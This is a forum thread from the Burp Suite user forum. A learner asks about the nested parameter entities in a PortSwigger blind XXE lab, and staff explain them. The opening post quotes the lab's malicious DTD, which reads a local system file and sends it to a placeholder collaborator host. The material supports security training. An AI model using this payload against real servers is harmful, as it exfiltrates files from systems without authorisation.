Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Nested parameter Entities (XXE labs)

Nerio.Stracci | Last updated: Mar 08, 2022 07:52PM UTC

Hi, I have a question about the parameters entites used in the Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD : (1) <!ENTITY % file SYSTEM "file:///etc/hostname"> (2) <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>"> (3) %eval; (4) %exfil; I don't understand the line (2) : why should we use 2 parameter entities ? Why not directly perform <!ENTITY % exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'> ?

Hannah, PortSwigger Agent | Last updated: Mar 09, 2022 09:12AM UTC

Hi

This is explained in the learning material here.

This DTD carries out the following steps:
  • Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
  • Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called exfiltrate. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string.

Muhammad | Last updated: Sep 16, 2022 06:10AM UTC

Hannah where it is mentioned

Hannah, PortSwigger Agent | Last updated: Sep 16, 2022 08:37AM UTC

The linked learning material can be found here: https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-exfiltrate-data-out-of-band

Rahul | Last updated: Aug 27, 2023 08:12AM UTC

I have explained this in my tweet and attached link to my answer on Security Stackexchange. https://twitter.com/irahulmali/status/1687797075218403328

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.